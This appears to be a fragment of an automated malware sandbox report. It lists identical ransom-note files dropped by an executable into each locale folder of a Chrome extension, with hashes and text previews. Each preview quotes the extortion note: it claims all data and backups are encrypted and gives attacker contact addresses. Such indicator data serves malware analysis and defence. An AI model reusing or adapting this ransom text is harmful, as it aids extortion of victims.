                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\_locales\cs\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\_locales\da\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\_locales\de\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\_locales\el\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\_locales\en_GB\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\_locales\en_US\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\_locales\es\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\_locales\es_419\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\_locales\et\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\_locales\fi\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\_locales\fil\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\_locales\fr\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\_locales\he\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\_locales\hi\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\_locales\hu\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\_locales\id\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\_locales\it\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\_locales\ja\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\_locales\ko\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\_locales\lt\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\_locales\lv\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\_locales\ms\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
